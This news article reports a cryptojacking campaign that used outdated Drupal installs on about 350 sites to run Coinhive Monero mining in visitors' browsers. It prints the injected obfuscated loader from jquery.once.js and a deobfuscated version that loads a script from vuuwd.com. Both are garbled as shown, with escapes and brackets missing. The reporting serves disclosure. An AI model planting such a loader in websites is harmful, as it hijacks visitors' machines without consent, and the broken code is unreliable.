An outdated version of Drupal, a popular content management system, let hackers mine the cryptocurrency Monero on over 300 websites including the websites for the “San Diego Zoo and the government of Chihuahua, Mexico.” A report by Troy Mursch outlined how the hack worked and even showed how much processing power browsers began taking up when they pointed at the hacked sites.
The hack uses a form of code injection that forces the browser to run Coinhive, a small bit of Javascript-based mining software. The code mines Monero, the ostensibly anonymous cryptocurrency.
The hacked sites all pointed to a URL – “http://vuuwd.com/t.js” – where Coinhive lived. The browser ran the software and began using up CPU power to mine the coin.
Mursch performed a comprehensive search for potentially affected sites and narrowed things down to about 350 sites, all of them running older versions of Drupal.
“The affected sites varied by hosting providers and countries and no specific one appeared to be targeted. The most unique domains were found in the United States and were hosted by Amazon,” he wrote.
The code appears at the end of jquery.once.js and is still visible on this site. It consists of a single line:
var dZ1= window["x64x6fx63x75x6dx65x6ex74"]["x67x65x74x45x6cx65x6dx65x6ex74x73x42x79x54x61x67x4ex61x6dx65"]('x68x65x61x64')[0]; var ZBRnO2= window["x64x6fx63x75x6dx65x6ex74"]["x63x72x65x61x74x65x45x6cx65x6dx65x6ex74"]('x73x63x72x69x70x74'); ZBRnO2["x74x79x70x65"]= 'x74x65x78x74x2fx6ax61x76x61x73x63x72x69x70x74'; ZBRnO2["x69x64"]='x6dx5fx67x5fx61';ZBRnO2["x73x72x63"]= 'x68x74x74x70x73x3ax2fx2fx76x75x75x77x64x2ex63x6fx6dx2fx74x2ex6ax73'; dZ1["x61x70x70x65x6ex64x43x68x69x6cx64"](ZBRnO2);
Which, deobfuscated, translates to:
'use strict';
var dZ1 = window["document"]"getElementsByTagName"[0];
var ZBRnO2 = window["document"]"createElement";
/** @type {string} */
ZBRnO2["type"] = "text/javascript";
/** @type {string} */
ZBRnO2["id"] = "m_g_a";
/** @type {string} */
ZBRnO2["src"] = "https://vuuwd.com/t.js";
dZ1"appendChild";
The domain it calls, vuuwd.com, is down.
BadPackets has a full list of the hacked websites and, as evidenced by the lines above, it doesn’t seem that many folks are rushing to fix their sites. A canonical list appears here.”
“Notable sites include those of Lenovo, UCLA, DLink (Brazil), and Office of Inspector General of the U.S. Equal Employment Opportunity Commission (EEOC) — a US federal government agency,” wrote Mursch.